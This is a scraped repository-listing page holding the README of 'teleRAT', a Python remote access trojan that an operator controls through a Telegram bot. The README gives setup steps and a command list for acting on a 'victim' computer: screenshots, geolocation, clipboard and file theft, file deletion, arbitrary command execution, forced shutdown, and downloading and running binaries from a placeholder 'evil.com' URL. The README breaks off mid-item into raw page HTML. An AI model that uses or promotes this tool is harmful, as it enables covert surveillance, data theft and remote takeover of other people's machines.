Telegram RAT written in Python

Related tags

Third-party APIs Wrapperspythonmalwareratmalware-researchremote-admin-tool
Overview

teleRAT

Python based RAT that uses Telegram for sending commands and receiving data to and from a victim computer.

Setup.py

  1. Insert your API key into the api variable inside the setup.py script & run it. This will setup your Telegram chat with your created bot with the necessary commands to avoid inserting each command along with the help message.
  • Read here to create your own bot and obtain your API token.
  1. Install necessary requirements: pip install -r requirements.txt
  2. Send a command to your Telegram bot
  3. Run python3 main.py

Available Commands

  • /whoami - returns username. no additional arguments required.
  • /screenshot - takes screenshots. requires the number of screenshots to take (EX: /screenshot 5 <- to take 5 screenshots)
  • /location - returns location info (region, state, zip code, estimated coordinates, timezone, country, ip address)
  • /metadata - returns metadata info about a specified file. requires filepath as an additional argument (EX: /metadata C:\Users\Username\Files\special.java <- will return metadata info about special.java)
  • /execute - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe [/c,ver] or /execute binary.exe none} in order to execute binary.exe with no arguments)
  • /power - allows operator to shutoff, hibernate, or restart computer. requires 1 additional argument: hibernate, pd (to power down), or restart (EX: /power pd <- to power down the victim's computer)
  • /ls - provides operator with directory listing. If no additional argument is provided, it provides directory listing for directory in which malware is. Additional argument of a directory is optional (EX: /ls %APPDATA% <- provides directory listing for APPDATA directory)
  • /delete - deletes a user specified file. Additional argument of filepath is required (EX: /delete C:\Users\Username\Files\temp.txt <- deletes a file named temp.txt)
  • /wreport - provides information regarding the wireless profiles the computer has connected to in the past, the drivers, and a list of wireless interfaces.
  • /remotebinary - download and execute a remote binary. Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe [-c,-f] <- to execute file.exe with flags c & f)
  • /processes - returns a list of running processes and services
  • /gather - return a specified file. requires 1 additional argument: the filepath (EX: /gather C:\Users\username\important\file.xlsx <- grab and upload file.xlsx to Telegram chat)
  • /report - provides a hardware report & Windows version to operator
  • /playnoise - plays a user specified noise. available list of noises include: asterisk sound (asterisk), exclamation sound (exclamation), exit sound (exit), hand sound (hand), question sound (question), and beep (beep) (EX: /playnoise beep or /playnoise question)
  • /gatherclip - returns data currently copied in the victim's clipboard. requires no additional arguments.
  • /messagebox - will present the victim with a message box. 2 additional arguments are required: caption and title for the window (EX: /messagebox </li> </ul> </article> </div> </div> </div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" type="3463953c43b18c592a02463e-text/javascript"></script> <ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-2693323733590204" data-ad-slot="1585190487"></ins> <script type="3463953c43b18c592a02463e-text/javascript">(adsbygoogle = window.adsbygoogle || []).push({});</script> </div> <div class="col-lg-4 right"> <div id="basic" class="tab-pane fade show active"> <div class="box shadow-sm rounded bg-white mb-3"> <div class="box-title border-bottom p-3"> <h6 class="m-0">Owner</h6> </div> <div class="d-flex align-items-center p-3 job-item-header"> <div class="overflow-hidden mr-2"> <h6 class="font-weight-bold -dark mb-0 text-truncate"> </h6> <div class="small text-gray-500"> </div> </div> <img class="img-fluid ml-auto" style="border-radius: 50%;" src="https://avatars.githubusercontent.com/u/56985822?v=4&s=60" alt=""> </div> <div class="box-body p-3"> <a href="/repo/gitHubRepo/1d8-teleRAT-python-third-party-apis-wrappers" rel="nofollow" target="_blank" class="btn btn-lg btn-block btn-danger mb-3"><i class="fa fa-github" aria-hidden="true"></i> GitHub Repository</a> </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/elsell-AutomaticTwitterGiveaways"><h6 class="font-weight-bold ">Automatically pick a winner who Retweeted, Commented, and Followed your Twitter account!</h6></a> <p class="mb-0 text-muted"> AutomaticTwitterGiveaways automates selecting winners for "Retweet, Comment, Follow" type Twitter giveaways.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/35787503?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 13, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Awiteb-coderHub"><h6 class="font-weight-bold ">A python library built on the API of the coderHub.sa, which helps you to fetch the challenges and more </h6></a> <p class="mb-0 text-muted"> coderHub A python library built on the API of the coderHub.sa, which helps you to fetch the challenges and more Installation • Features • Usage • Lice</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/59842932?v=4&s=60" alt="TheAwiteb"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 5 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 04, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/hemantapkh-1337x"><h6 class="font-weight-bold ">✖️ Unofficial API of 1337x.to</h6></a> <p class="mb-0 text-muted"> ✖️ Unofficial Python API Wrapper of 1337x This is the unofficial API of 1337x. It supports all proxies of 1337x and almost all functions of 1337x. You</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/58947310?v=4&s=60" alt="Hemanta Pokharel"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 71 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 26, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/lntechnical2-youtube_data_api-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">• Create Your Own YouTube Info Api.</h6></a> <p class="mb-0 text-muted"> youtube_data_api • Create Your Own YouTube Info Api. Deploy How to Use https://{ Heroku App Name }.herokuapp.com/api?link={YouTube link} In local Host</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/82169706?v=4&s=60" alt="lokaman chendekar"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 12 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 02, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/caroso1222-wapy-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">🤖 A fully featured, easy to use Python wrapper for the Walmart Open API</h6></a> <p class="mb-0 text-muted"> Wapy Wapy is a fully featured Python wrapper for the Walmart Open API. Features Easy to use, object oriented interface to the Walmart Open API. (Produ</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/3689856?v=4&s=60" alt="Carlos Roso"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 43 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 14, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/JoseNoriegaa-pydottie-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">PyDottie is a version of Dottie.js written in Python 3.</h6></a> <p class="mb-0 text-muted"> PyDottie is a version of Dottie.js written in Python 3.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/28733681?v=4&s=60" alt="Jose Noriega"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 21, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/luisnquin-ChannelViaGoogleDrive-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">With Google Drive API. My computer and my phone are in love now. </h6></a> <p class="mb-0 text-muted"> Channel trought Google Drive Google Drive API In this case, "Google Drive App" is the program. To install everything you need(has some extra things), </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/86449787?v=4&s=60" alt="Luis Quiñones Requelme"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 15, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Saratoga-CV6-haruka-rewrite-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">A simple, lightweight Discord bot running with only 512 MB memory on Heroku</h6></a> <p class="mb-0 text-muted"> Haruka This used to be a music bot, but people keep using it for NSFW content. Can't everyone be less horny? Bot commands See the built-in help comman</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/57554044?v=4&s=60" alt="Haruka"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 4 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 26, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/MarshalX-telegram-crawler"><h6 class="font-weight-bold ">Automatically detect changes made to the official Telegram sites.</h6></a> <p class="mb-0 text-muted"> 🕷 Telegram Web Crawler This project is developed to automatically detect changes made to the official Telegram sites. This is necessary for anticipat</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/15520314?v=4&s=60" alt="Il'ya"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 115 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 31, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Akshay314-personalprojects-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">AWS SQS event redrive Lambda With Python</h6></a> <p class="mb-0 text-muted"> AWS SQS event redrive Lambda This repository contains one simple AWS Lambda function in Python to redrive AWS SQS events from source queue to destinat</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/11438287?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 19, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/borgbase-vorta"><h6 class="font-weight-bold ">Desktop Backup Client for Borg</h6></a> <p class="mb-0 text-muted"> Vorta Backup Client Vorta is a backup client for macOS and Linux desktops. It integrates the mighty BorgBackup with your desktop environment to protec</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/44523682?v=4&s=60" alt="BorgBase.com"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1.5k <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 03, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/knowsuchagency-orkestra-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">The elegance of Airflow + the power of AWS</h6></a> <p class="mb-0 text-muted"> Orkestra The elegance of Airflow + the power of AWS </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/11974795?v=4&s=60" alt="Stephan Fitzpatrick"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 42 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 01, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Reckless-Satoshi-reckless-withdrawals"><h6 class="font-weight-bold ">A collection of scripts to steal BTC from Lightning Network enabled custodial services. Only for educational purpose! Share your findings only when design flaws are fixed.</h6></a> <p class="mb-0 text-muted"> Lightning Network Fee Siphoning Attack LN-fee-siphoning is a collection of scripts to subtract BTC from Lightning Network enabled custodial services b</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/90936742?v=4&s=60" alt="Reckless_Satoshi"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 14 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 15, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Raphtory-raphtory-client"><h6 class="font-weight-bold ">Raphtory-client - The python client for the Raphtory project</h6></a> <p class="mb-0 text-muted"> Raphtory Client This is the python client for the Raphtory project Install via p</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/67148275?v=4&s=60" alt="Raphtory"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 5 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Apr 28, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/sherlock-project-sherlock-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">🔎 Hunt down social media accounts by username across social networks</h6></a> <p class="mb-0 text-muted"> Hunt down social media accounts by username across social networks Installation | Usage | Docker Notes | Contributing Installation # clone the repo $ </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/48293496?v=4&s=60" alt="Sherlock"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 38.2k <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 01, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/kremayard-krema"><h6 class="font-weight-bold ">🚀 A fast, flexible and lightweight Discord API wrapper for Python.</h6></a> <p class="mb-0 text-muted"> Krema A fast, flexible and lightweight Discord API wrapper for Python. Installation Unikorn unikorn add kremayard krema -no-confirmation Pip pip insta</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/87482214?v=4&s=60" alt="Krema"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 20 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Sep 04, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Akshat7678-Arjvps_VcMusic-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Telegram bot to stream videos in telegram Voice Chat for both groups and channels</h6></a> <p class="mb-0 text-muted"> Telegram bot to stream videos in telegram Voice Chat for both groups and channels. Supports live steams, YouTube videos and telegram media. Supports scheduling streams, recording and many more.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/73880884?v=4&s=60" alt="Akki ThePro"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Sep 11, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/douglasalves0-whatsapp-api-python"><h6 class="font-weight-bold "> WhatsApp API Python ChatBot</h6></a> <p class="mb-0 text-muted"> WhatsApp Api Python - Esta documentação tem como objetivo exemplificar o uso do Moorse Whatsapp API na linguagem Python. </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/96065177?v=4&s=60" alt="Douglas Alves"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 06, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/IDN-C-X-IDN-Subs-Count-UserBot"><h6 class="font-weight-bold ">A Telegram user bot to count telegram channel subscriber or group member.</h6></a> <p class="mb-0 text-muted"> Subscriber Count Userbot A Telegram user bot to count telegram channel subscriber or group member. This tool is only for educational purpose. You coul</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/91923050?v=4&s=60" alt="IDNCoderX"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 8 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 30, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/alexover1-pinopoly-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Pinopoly is a tool to remove the "banker" player and replace them with a digitalized system</h6></a> <p class="mb-0 text-muted"> Pinopoly is a tool to remove the "banker" player and replace them with a digitalized system. It is intended to be used on a Raspberry Pi but can be used in the command line as well.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/47640630?v=4&s=60" alt="Alex Overstreet"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 11 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jul 09, 2022 </div> </div> </div> </div> </div> </div> <footer class="bg-white"> <div class="container"> <div class="copyright"> <div class="logo"> <a href="/"> <img src="/assets/images/logo_pythonrepo.png"> </a> </div> <p>2022.PythonRepo </p> <ul class="social"> <li> <a href="/about">About</a>   </li> <li> <a href="/contact">Contact Us</a>   </li> <li> <a href="/dmca">DMCA</a>   </li> <li> <a href="/disclaimer">Disclaimer</a>   </li> <li> <a href="/privacypolicy">Privacy Policy</a>   </li> </ul> </div> </div> </footer> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha512-bnIvzh6FU75ZKxp0GXLH9bewza/OIw6dLVh9ICg0gogclmYGguQJWl8U30WpbsGTqbIiAwxTsbe76DErLq5EDQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/js/bootstrap.bundle.min.js" integrity="sha512-Oy5BruJdE3gP9+LMJ11kC5nErkh3p4Y0GawT1Jrcez4RTDxODf3M/KP3pEsgeOYxWejqy2SPnj+QMpgtvhDciQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/js/select2.min.js" integrity="sha512-2ImtlRlf2VVmiGZsjm9bEyhjGW4dU7B6TNwh/hx/iSByxNENtj3WVE6o/9Lj4TJeVXPi4bnOIMXFIJJAeufa0A==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="/assets/js/custom.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> $(function() { $("img.lazy").lazyload({ threshold :180, failurelimit :20, effect : "fadeIn" }); }); </script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> hljs.initHighlightingOnLoad(); </script> <script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="3463953c43b18c592a02463e-|49" defer=""></script> <script src="/static/js/jquery-3.6.0.min.js" type="text/javascript"></script> <script src="/adview_pic_cpc_cpm_cpa_guanggao_gg_ads_300x250.js?v=1715450115" type="text/javascript"></script> </body> </html>